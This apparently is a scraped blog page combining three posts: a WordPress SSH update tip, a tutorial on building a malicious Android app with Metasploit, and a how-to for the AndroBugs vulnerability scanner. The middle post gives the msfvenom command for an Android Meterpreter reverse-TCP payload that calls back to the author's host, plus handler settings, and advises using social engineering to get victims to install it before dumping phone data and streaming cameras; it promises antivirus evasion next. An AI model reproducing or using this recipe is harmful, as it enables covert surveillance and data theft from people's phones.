If you are running WordPress on Ubuntu 16.04 or above you will need this to allow you to update securely over SSH. If you are not yet running on php7.0 then skip installing php7.0-cli as it will probably break your install, but SSH should still work on the older version with nothing else added.
It’s pretty simple, all you need to do is update apt repositories.
sudo apt-get update
sudo apt-get install php7.0-cli -y
sudo apt-get install libssh2-1 php-ssh2 -y
And that’s it.
For a guide on setting up your ssh keys go here for instructions on that.
So, recently got interested in how secure Android apps are and how I could learn a bit more about them. The best way to learn? Create my own malicious App!
What else would we use other than Metasploit?
So we fire up the console like so…
service postgresql start
First we need to create the malicious .apk file, so open another Terminal Window and use the following making sure you enter your IP and port number after the “=” symbols.
msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xxxx -o malicious.apk
You can name the app whatever you like using the “-o” switch. There are also other options you can specify but we will keep it simple for now.
In the first Window running Metasploit we now start a handler which will “listen” for when our app is installed and used which launches the connection attempt. We do this like so.
Then we need to set IP, Port and Payload. The port and IP need to be the same set in the previous steps when using msfvenom
set LHOST xx.xx.xx.xx
set LPORT xxxx
set PAYLOAD android/meterpreter/reverse_tcp
We can check what is required for an exploit at any time once it is loaded by running
We have everything we need now configured so we can start the “listener”
Then we use social engineering to try and get someone to install and run it.
When they do you will the connection come back from the phone.
In this example we got 2 connections! We can list them with this command
We can then connect by using the same command but choosing which session we want to connect to.
And then quickly get some info to confirm the device.
Then we can quickly dump info from the phone imediately using the dump commands
You can also capture a screen shot, take a photo front either camera, or even stream live from either camera on the device. Scary huh?
If you have NO anti Virus on your Android, and you have disabled the “verify app” feature then this simple app will run without any issues.
If you have an Android phone, enable the app verifier, and get some anti virus to at least give yourself a fighting chance!
There will be a follow up to this post as there are tools we can use to make our malicious apps look better and be less likely to be blocked by anti virus. That’s it for now though.
Recently I had the need to assess some Android Apps and had to hunt quite a bit for something decent but I found it Here. The AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications, and it’s QUICK!
I use Linux so to get up and running is as simple as downloading from the above link, unzipping to somewhere convenient, making sure you have python installed and for basic usage that’s it!
I have an Android app named “app.apk” and a Reports folder in the Framework-master folder.
So from within the Androbugs-framework folder we simply run
python androbugs.py -f ~/Downloads/app.apk -o Reports
Thats it! We get a really good report listing bugs, CVE’s, and TLS issues to name a few.
There is a “Massive Analysis Tool” for linux which requires a bit more setup which looks really good. It require’s the setup of a MongoDB so once I’ve got that up and running I’ll post on it.